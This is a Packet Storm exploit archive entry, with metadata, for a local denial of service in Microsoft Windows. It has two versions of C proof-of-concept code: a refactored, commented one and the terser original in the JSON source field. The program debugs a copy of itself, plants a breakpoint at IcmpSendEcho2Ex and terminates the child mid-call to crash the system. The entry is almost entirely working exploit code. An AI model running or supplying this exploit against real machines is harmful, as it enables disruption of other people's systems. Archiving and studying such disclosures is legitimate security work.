ID PACKETSTORM:92991
Type packetstorm
Reporter l3D
Modified 2010-08-24T00:00:00
Description
`/*
Microsoft Windows DoS (IcmpSendEcho2Ex interrupting)
Author: l3D
Sites: http://nullbyte.org.il, http://forums.hacking.org.il
IRC: irc://irc.nix.co.il/#security
Email: pupipup33@gmail.com
Tested on Windows 7. As published the code is 32-bit x86 only: the debugger rewinds CONTEXT.Eip and passes a code pointer through an unsigned long.
The author reports that terminating the child while a call into IcmpSendEcho2Ex is still pending causes a local denial of service.
Pass an IP address that does not answer, so the echo request blocks for its full timeout instead of returning before the child is killed.
*/
#include <stdio.h>
#include <stdlib.h>
/* winsock2.h must precede windows.h: windows.h otherwise pulls in the
 * legacy winsock.h, whose declarations clash with winsock2.h. */
#include <winsock2.h>
#include <windows.h>
#include <iphlpapi.h>
#pragma comment(lib, "iphlpapi.lib")
#pragma comment(lib, "ws2_32.lib")
/* Marker the child stores in ExceptionInformation[0] of the breakpoint it
 * raises, so the debugger can tell that exception apart from any other
 * breakpoint it sees (ExceptionInformation[1] then carries the address of
 * IcmpSendEcho2Ex in the child). */
#define PARAM 0xDEADBEEF
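/*
 * Thread procedure started by the debugger once the planted breakpoint on
 * IcmpSendEcho2Ex has fired and been lifted.  The 150 ms delay gives the
 * debuggee time to re-enter the call (which blocks for up to 1000 ms when
 * the destination does not answer) before it is killed mid-call.
 *
 * hProcess: the debuggee's process handle, passed as the CreateThread
 *           parameter.  Always returns 0; a failed TerminateProcess is
 *           reported on stderr rather than silently ignored.
 *
 * Declared with the real thread-procedure signature (DWORD WINAPI, LPVOID)
 * so that CreateThread's calling convention matches on every target.
 */
DWORD WINAPI Terminate(LPVOID hProcess)
{
    Sleep(150);
    if (!TerminateProcess((HANDLE)hProcess, (UINT)-1))
        fprintf(stderr, "TerminateProcess: Win32 error %lu\n",
                (unsigned long)GetLastError());
    return 0;
}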
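/* Breakpoint helpers; defined after main() in this file. */
BOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte);
BOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte);

/*
 * Typed views of the kernel32 debugging exports.  They are still resolved
 * with GetProcAddress (as in the original) so the build does not depend on
 * the SDK's _WIN32_WINNT setting, but calls go through real prototypes
 * instead of untyped FARPROCs.
 */
typedef BOOL (WINAPI *PfnDebugSetProcessKillOnExit)(BOOL);
typedef BOOL (WINAPI *PfnDebugActiveProcessStop)(DWORD);
typedef HANDLE (WINAPI *PfnOpenThread)(DWORD, BOOL, DWORD);

/* Report a failed Win32 call.  perror() only knows errno and says nothing
 * useful about GetLastError(). */
static void ReportWin32Error(const char *what)
{
    fprintf(stderr, "%s: Win32 error %lu\n", what, (unsigned long)GetLastError());
}

/*
 * Debuggee role.  Publishes the address of IcmpSendEcho2Ex to the parent
 * debugger through a breakpoint exception tagged with PARAM, then issues an
 * ICMP echo to ipText.  The PoC relies on IcmpSendEcho reaching
 * IcmpSendEcho2Ex internally, where the parent has planted an int3; with a
 * destination that does not answer the call blocks for its 1000 ms timeout,
 * during which the parent terminates this process.
 *
 * Returns the process exit code: 1 on a setup failure, 0 only if the echo
 * call actually returns (which the PoC does not expect).
 */
static int RunChild(const char *ipText)
{
    int rc = 1;
    HMODULE iphlpapi = NULL;
    HANDLE hIcmpFile = INVALID_HANDLE_VALUE;
    void *reply = NULL;
    char data[32] = {0};
    DWORD replySize = sizeof(ICMP_ECHO_REPLY) + sizeof(data);
    unsigned long ipaddr = inet_addr(ipText);
    ULONG_PTR params[2];
    FARPROC target;

    if (ipaddr == INADDR_NONE) {
        fprintf(stderr, "Illegal IP address: %s\n", ipText);
        return 1;
    }

    /* ANSI entry points are used explicitly: argv is char**, so the code
     * must not silently switch to the wide APIs when UNICODE is defined. */
    iphlpapi = LoadLibraryA("iphlpapi.dll");
    if (!iphlpapi) {
        ReportWin32Error("LoadLibrary(iphlpapi.dll)");
        return 1;
    }
    /* Looked up at run time: the export is not present on every Windows
     * release, and the parent needs its address inside this process. */
    target = GetProcAddress(iphlpapi, "IcmpSendEcho2Ex");
    if (!target) {
        fputs("iphlpapi.dll does not export IcmpSendEcho2Ex\n", stderr);
        goto out;
    }

    hIcmpFile = IcmpCreateFile();
    if (hIcmpFile == INVALID_HANDLE_VALUE) {
        ReportWin32Error("IcmpCreateFile");
        goto out;
    }
    reply = malloc(replySize);
    if (!reply) {
        fputs("out of memory\n", stderr);
        goto out;
    }

    /* Hand the target address to the debugger.  The parent recognises this
     * breakpoint by PARAM in ExceptionInformation[0] and resumes us. */
    params[0] = PARAM;
    params[1] = (ULONG_PTR)target;
    RaiseException(EXCEPTION_BREAKPOINT, 0, 2, params);
    puts("Exception raised!");

    IcmpSendEcho(hIcmpFile, ipaddr, data, sizeof(data), NULL, reply, replySize, 1000);
    puts("This line should never be shown...");
    rc = 0;

out:
    free(reply);
    if (hIcmpFile != INVALID_HANDLE_VALUE)
        IcmpCloseHandle(hIcmpFile);
    FreeLibrary(iphlpapi);
    return rc;
}

/*
 * After the int3 planted at the target fires, the faulting thread's
 * instruction pointer is one past the int3.  Back it up by one so the
 * restored original byte executes when the thread resumes.
 * Returns FALSE (after reporting the failure) if the thread could not be
 * opened or its context could not be read or written.
 */
static BOOL RewindOverBreakpoint(PfnOpenThread pOpenThread, DWORD threadId)
{
    CONTEXT ctx;
    BOOL ok;
    HANDLE hThread = pOpenThread(THREAD_ALL_ACCESS, FALSE, threadId);

    if (!hThread) {
        ReportWin32Error("OpenThread");
        return FALSE;
    }
    ZeroMemory(&ctx, sizeof(ctx));
    ctx.ContextFlags = CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS;
    ok = GetThreadContext(hThread, &ctx);
    if (ok) {
#if defined(_M_X64) || defined(__x86_64__)
        ctx.Rip -= 1;
#else
        ctx.Eip -= 1;
#endif
        ok = SetThreadContext(hThread, &ctx);
    }
    if (!ok)
        ReportWin32Error("Get/SetThreadContext");
    CloseHandle(hThread);
    return ok;
}

/*
 * Debugger role.  Re-executes this program under DEBUG_PROCESS, waits for
 * the child's PARAM breakpoint to learn where IcmpSendEcho2Ex lives, plants
 * an int3 there and, when it fires, restores the byte, rewinds the
 * instruction pointer and starts Terminate() to kill the child 150 ms into
 * the call.  Any other exception in the child detaches the debugger.
 *
 * Returns the process exit code: 0 once the child has exited, 1 on any
 * failure (the child, if running, is killed when this process exits
 * because of DebugSetProcessKillOnExit).
 */
static int RunDebugger(const char *ipText)
{
    int rc = 1;
    char path[MAX_PATH];
    char args[2 * MAX_PATH];
    int len;
    DWORD n;
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    DEBUG_EVENT ev;
    EXCEPTION_RECORD *rec = &ev.u.Exception.ExceptionRecord;
    void *target = NULL;    /* IcmpSendEcho2Ex in the child, once reported */
    char originalByte = 0;  /* code byte displaced by the int3 */
    HANDLE hKiller = NULL;  /* Terminate() thread, once started */
    HMODULE kernel32;
    PfnDebugSetProcessKillOnExit pDebugSetProcessKillOnExit = NULL;
    PfnDebugActiveProcessStop pDebugActiveProcessStop = NULL;
    PfnOpenThread pOpenThread = NULL;

    /* Validate here too: a bad address is cheaper to reject than a child. */
    if (inet_addr(ipText) == INADDR_NONE) {
        fprintf(stderr, "Illegal IP address: %s\n", ipText);
        return 1;
    }

    /* kernel32 is always mapped; no LoadLibrary/FreeLibrary pair needed. */
    kernel32 = GetModuleHandleA("kernel32.dll");
    if (kernel32) {
        pDebugSetProcessKillOnExit = (PfnDebugSetProcessKillOnExit)
            GetProcAddress(kernel32, "DebugSetProcessKillOnExit");
        pDebugActiveProcessStop = (PfnDebugActiveProcessStop)
            GetProcAddress(kernel32, "DebugActiveProcessStop");
        pOpenThread = (PfnOpenThread)GetProcAddress(kernel32, "OpenThread");
    }
    if (!pDebugSetProcessKillOnExit || !pDebugActiveProcessStop || !pOpenThread) {
        fputs("kernel32.dll lacks the required debugging exports\n", stderr);
        return 1;
    }

    n = GetModuleFileNameA(NULL, path, sizeof(path));
    if (n == 0 || n >= sizeof(path)) {
        ReportWin32Error("GetModuleFileName");
        return 1;
    }
    /* Quote the image path: CreateProcess splits an unquoted command line
     * at the first space, which breaks for an installation path with
     * spaces in it. */
    len = snprintf(args, sizeof(args), "\"%s\" %s", path, ipText);
    if (len < 0 || (size_t)len >= sizeof(args)) {
        fputs("command line too long\n", stderr);
        return 1;
    }

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    ZeroMemory(&pi, sizeof(pi));
    if (!CreateProcessA(NULL, args, NULL, NULL, FALSE, DEBUG_PROCESS,
                        NULL, NULL, &si, &pi)) {
        ReportWin32Error("CreateProcess");
        return 1;
    }
    /* pi.hProcess already carries full access; the original's extra
     * OpenProcess(PROCESS_ALL_ACCESS) was redundant and leaked. */
    pDebugSetProcessKillOnExit(TRUE);

    for (;;) {
        ZeroMemory(&ev, sizeof(ev));
        if (!WaitForDebugEvent(&ev, INFINITE)) {
            ReportWin32Error("WaitForDebugEvent");
            break;
        }
        if (ev.dwDebugEventCode == EXIT_PROCESS_DEBUG_EVENT) {
            rc = 0;
            /* Acknowledge so the debuggee can finish tearing down. */
            ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE);
            break;
        }
        if (ev.dwDebugEventCode == EXCEPTION_DEBUG_EVENT) {
            if (rec->ExceptionCode != EXCEPTION_BREAKPOINT) {
                /* Not one of ours: detach and let the child deal with it. */
                fprintf(stderr, "Exception 0x%08lx at %p in child\n",
                        (unsigned long)rec->ExceptionCode, rec->ExceptionAddress);
                pDebugActiveProcessStop(ev.dwProcessId);
                break;
            }
            if (rec->NumberParameters > 1 && rec->ExceptionInformation[0] == PARAM) {
                /* The child's RaiseException(): learn the target, plant int3. */
                target = (void *)rec->ExceptionInformation[1];
                printf("IcmpSendEcho2Ex %p\n", target);
                if (!BreakpointSet(pi.hProcess, target, &originalByte)) {
                    ReportWin32Error("BreakpointSet");
                    break;
                }
            } else if (target != NULL && rec->ExceptionAddress == target) {
                /* Our int3 fired: lift it, step back over it, schedule kill. */
                printf("EIP %p\n", target);
                if (!BreakpointRetrieve(pi.hProcess, target, &originalByte)) {
                    ReportWin32Error("BreakpointRetrieve");
                    break;
                }
                if (!RewindOverBreakpoint(pOpenThread, ev.dwThreadId))
                    break;
                hKiller = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Terminate,
                                       pi.hProcess, 0, NULL);
                if (!hKiller) {
                    ReportWin32Error("CreateThread");
                    break;
                }
            }
            /* Any other breakpoint (e.g. the one delivered when the process
             * starts) is simply acknowledged below. */
        }
        if (!ContinueDebugEvent(ev.dwProcessId, ev.dwThreadId, DBG_CONTINUE)) {
            ReportWin32Error("ContinueDebugEvent");
            break;
        }
    }

    /* Let the killer thread finish with pi.hProcess before it is closed. */
    if (hKiller) {
        WaitForSingleObject(hKiller, INFINITE);
        CloseHandle(hKiller);
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return rc;
}

/*
 * Entry point.  Usage: <program> <ip address>.
 *
 * The program runs itself twice: the first instance is the debugger, which
 * re-executes the same image under DEBUG_PROCESS; the second instance
 * detects the attached debugger with IsDebuggerPresent() and takes the
 * debuggee path.  Consequently, launching this tool under a debugger of
 * your own makes the first instance behave as the child.
 */
int main(int argc, char **argv)
{
    if (argc < 2) {
        printf("Usage: %s <ip address>\n", argv[0]);
        return 1;
    }
    if (IsDebuggerPresent())
        return RunChild(argv[1]);
    return RunDebugger(argv[1]);
}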
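/*
 * Plant an int3 (0xCC) at addr in hProcess, saving the displaced byte in
 * *originalByte for BreakpointRetrieve().  The page is made writable for
 * the patch and its previous protection is restored afterwards, also when
 * the read or write fails, so a partial failure does not leave the
 * target's code page writable.
 * Returns TRUE only if the byte was saved, the int3 written and the
 * protection restored.
 */
BOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte)
{
    unsigned long oldProtect = 0, unused = 0;
    BOOL ok;

    if (!VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect))
        return FALSE;
    ok = ReadProcessMemory(hProcess, addr, originalByte, 1, NULL) &&
         WriteProcessMemory(hProcess, addr, "\xCC", 1, NULL);
    if (!VirtualProtectEx(hProcess, addr, 1, oldProtect, &unused))
        ok = FALSE;
    return ok;
}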
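/*
 * Undo BreakpointSet(): write the saved original byte back to addr in
 * hProcess.  The page is made writable for the write and its previous
 * protection is restored afterwards, also when the write fails.
 * Returns TRUE only if the byte was written and the protection restored.
 */
BOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte)
{
    unsigned long oldProtect = 0, unused = 0;
    BOOL ok;

    if (!VirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect))
        return FALSE;
    ok = WriteProcessMemory(hProcess, addr, originalByte, 1, NULL);
    if (!VirtualProtectEx(hProcess, addr, 1, oldProtect, &unused))
        ok = FALSE;
    return ok;
}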
`
{"type": "packetstorm", "published": "2010-08-24T00:00:00", "reporter": "l3D", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "b912e3f22b6de23db55f8623f1b6633c"}, {"key": "modified", "hash": "b6028155e9851a008863f3ee4fb15eaa"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "b6028155e9851a008863f3ee4fb15eaa"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "3e9e551df6611bc050fd13f37769723e"}, {"key": "sourceData", "hash": "0ed6b43759a2d14b7c127c65ebfcb5e9"}, {"key": "sourceHref", "hash": "2e40db38b45a2159022a08e08ae0d2b5"}, {"key": "title", "hash": "147300b688f61bd3f0d80232c888d75d"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`/* \nMicrosoft Windows DoS (IcmpSendEcho2Ex interrupting) \nAuthor: l3D \nSites: http://nullbyte.org.il, http://forums.hacking.org.il \nIRC: irc://irc.nix.co.il/#security \nEmail: pupipup33@gmail.com \nTested on Windows 7 \n \nMicrosoft Windows operating system is prone to a local DoS by interrupting the function IcmpSendEcho2Ex. \nThe IP address argument should be a non-exist IP address on the net, so the function will wait longer time. 
\n*/ \n#include <stdio.h> \n#include <windows.h> \n#include <iphlpapi.h> \n#include <winsock2.h> \n \n#pragma comment(lib, \"iphlpapi.lib\") \n#pragma comment(lib, \"ws2_32.lib\") \n \n#define PARAM 0xDEADBEEF \n \nvoid Terminate(HANDLE hProcess){ \nSleep(150); \nTerminateProcess(hProcess, -1); \n} \n \nint main(int argc, char **argv){ \nif( argc<2){ \nprintf(\"Usage: %s <ip address>\\n\", argv[0]); \nreturn 1; \n} \n \nif( IsDebuggerPresent()){ \nHANDLE iphlpapi=LoadLibrary(\"iphlpapi.dll\"); \nif( !iphlpapi){ \nperror(\"iphlpapi.dll\"); \nreturn 1; \n} \nFARPROC IcmpSendEcho=GetProcAddress(iphlpapi, \"IcmpSendEcho\"); \nFARPROC IcmpCreateFile=GetProcAddress(iphlpapi, \"IcmpCreateFile\"); \nFARPROC IcmpCloseHandle=GetProcAddress(iphlpapi, \"IcmpCloseHandle\"); \nif( (IcmpSendEcho && IcmpCreateFile && IcmpCloseHandle)==0){ \nperror(\"icmp functions\"); \nreturn 1; \n} \n \nunsigned long ipaddr=INADDR_NONE, params[2]; \nHANDLE hIcmpFile; \nchar data[32], *reply; \nint replySize=sizeof(ICMP_ECHO_REPLY)+sizeof(data); \n \nif( (ipaddr=inet_addr(argv[1]))==INADDR_NONE){ \nperror(\"Illegal IP address!\"); \nreturn 1; \n} \n \nif( (hIcmpFile=(HANDLE)IcmpCreateFile())==INVALID_HANDLE_VALUE){ \nperror(\"IcmpCreateFile\"); \nreturn 1; \n} \n \nreply=(char *)malloc(replySize); \nZeroMemory(data, sizeof(data)); \nparams[0]=PARAM; \nparams[1]=(unsigned long)GetProcAddress(iphlpapi, \"IcmpSendEcho2Ex\"); \n \nRaiseException(EXCEPTION_BREAKPOINT, 0, 2, params); \nputs(\"Exception raised!\"); \nIcmpSendEcho(hIcmpFile, ipaddr, data, sizeof(data), NULL, reply, replySize, 1000); \nputs(\"This line should never be shown...\"); \nIcmpCloseHandle(hIcmpFile); \nreturn 0; \n} \n \nPROCESS_INFORMATION pi; \nSTARTUPINFO si; \nHANDLE hProcess, hThread; \nDEBUG_EVENT debugEvent; \nEXCEPTION_RECORD *ExceptionRecord=&debugEvent.u.Exception.ExceptionRecord; \nCONTEXT context; \nFARPROC IcmpSendEcho2Ex=NULL; \nchar path[256], args[512], originalByte[1]; \n \nZeroMemory(\u03c0, 
sizeof(PROCESS_INFORMATION)); \nZeroMemory(&si, sizeof(STARTUPINFO)); \nZeroMemory(&debugEvent, sizeof(DEBUG_EVENT)); \nZeroMemory(&context, sizeof(CONTEXT)); \nZeroMemory(path, sizeof(path)); \nZeroMemory(args, sizeof(args)); \nsi.cb=sizeof(STARTUPINFO); \nsi.dwFlags=STARTF_USESHOWWINDOW; \nsi.wShowWindow=SW_HIDE; \ncontext.ContextFlags=CONTEXT_FULL | CONTEXT_DEBUG_REGISTERS; \n \nGetModuleFileName(NULL, path, sizeof(path)-1); \nsnprintf(args, sizeof(args)-1, \"%s %s\", path, argv[1]); \n \nif( !CreateProcess( \nNULL, \nargs, \nNULL, \nNULL, \nFALSE, \nDEBUG_PROCESS, \nNULL, \nNULL, \n&si, \n\u03c0 \n)){ \nperror(\"CreateProcess\"); \nreturn 1; \n} \n \nif( (hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pi.dwProcessId))==NULL){ \nperror(\"OpenProcess\"); \nreturn 1; \n} \n \nHANDLE kernel32=LoadLibrary(\"kernel32.dll\"); \nFARPROC DebugSetProcessKillOnExit=GetProcAddress(kernel32, \"DebugSetProcessKillOnExit\"); \nFARPROC DebugActiveProcessStop=GetProcAddress(kernel32, \"DebugActiveProcessStop\"); \nFARPROC OpenThread=GetProcAddress(kernel32, \"OpenThread\"); \nCloseHandle(kernel32); \nDebugSetProcessKillOnExit(TRUE); \n \nwhile(WaitForDebugEvent(&debugEvent, INFINITE) && debugEvent.dwDebugEventCode!=EXIT_PROCESS_DEBUG_EVENT){ \nif( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT && ExceptionRecord->ExceptionCode==EXCEPTION_BREAKPOINT){ \nif( ExceptionRecord->NumberParameters>1 && ExceptionRecord->ExceptionInformation[0]==PARAM){ \nIcmpSendEcho2Ex=(FARPROC)ExceptionRecord->ExceptionInformation[1]; \nprintf(\"IcmpSendEcho2Ex %p\\n\", IcmpSendEcho2Ex); \nif( !BreakpointSet(hProcess, IcmpSendEcho2Ex, &originalByte)){ \nperror(\"BreakpointSet\"); \nbreak; \n} \n} \nelse if( ExceptionRecord->ExceptionAddress==IcmpSendEcho2Ex){ \nprintf(\"EIP %p\\n\", IcmpSendEcho2Ex); \nif( !BreakpointRetrieve(hProcess, IcmpSendEcho2Ex, &originalByte)){ \nperror(\"BreakpointRetrieve\"); \nbreak; \n} \nif((hThread=(HANDLE)OpenThread(THREAD_ALL_ACCESS, FALSE, 
debugEvent.dwThreadId))==NULL) puts(\"OpenThread\"); \nif(!GetThreadContext(hThread, &context)) puts(\"GetThreadContext\"); \ncontext.Eip -= 1; \nif(!SetThreadContext(hThread, &context)) puts(\"SetThreadContext\"); \nCreateThread(NULL, 0, (void *)Terminate, hProcess, 0, NULL); \n} \n} \nelse if( debugEvent.dwDebugEventCode==EXCEPTION_DEBUG_EVENT){ \nputs(\"Exception!\"); \nDebugActiveProcessStop(debugEvent.dwProcessId); \nbreak; \n} \nContinueDebugEvent(debugEvent.dwProcessId, debugEvent.dwThreadId, DBG_CONTINUE); \nZeroMemory(&debugEvent, sizeof(DEBUG_EVENT)); \n} \n \nreturn 0; \n} \n \nBOOL BreakpointSet(HANDLE hProcess, void *addr, char *originalByte){ \nunsigned long oldProtect; \nif( \nVirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect) && \nReadProcessMemory(hProcess, addr, originalByte, 1, NULL) && \nWriteProcessMemory(hProcess, addr, \"\\xCC\", 1, NULL) && \nVirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect)) \nreturn TRUE; \nelse return FALSE; \n} \n \nBOOL BreakpointRetrieve(HANDLE hProcess, void *addr, char *originalByte){ \nunsigned long oldProtect; \nif( \nVirtualProtectEx(hProcess, addr, 1, PAGE_EXECUTE_READWRITE, &oldProtect) && \nWriteProcessMemory(hProcess, addr, originalByte, 1, NULL) && \nVirtualProtectEx(hProcess, addr, 1, oldProtect, &oldProtect)) \nreturn TRUE; \nelse return FALSE; \n} \n \n \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:19:27", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/92991/Microsoft-Windows-IcmpSendEcho2Ex-Denial-Of-Service.html", "sourceHref": "https://packetstormsecurity.com/files/download/92991/mswinicmp-dos.txt", "title": "Microsoft Windows IcmpSendEcho2Ex Denial Of Service", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "dependencies": {"references": [], "modified": "2016-11-03T10:19:27"}, "vulnersScore": 5.0}, "references": [], "id": "PACKETSTORM:92991", "hash": 
"c57bcc281af5826641e2c84022aad52478c2e7efb953166244eb3b542b6c97be", "edition": 1, "cvelist": [], "modified": "2010-08-24T00:00:00", "description": ""}
{}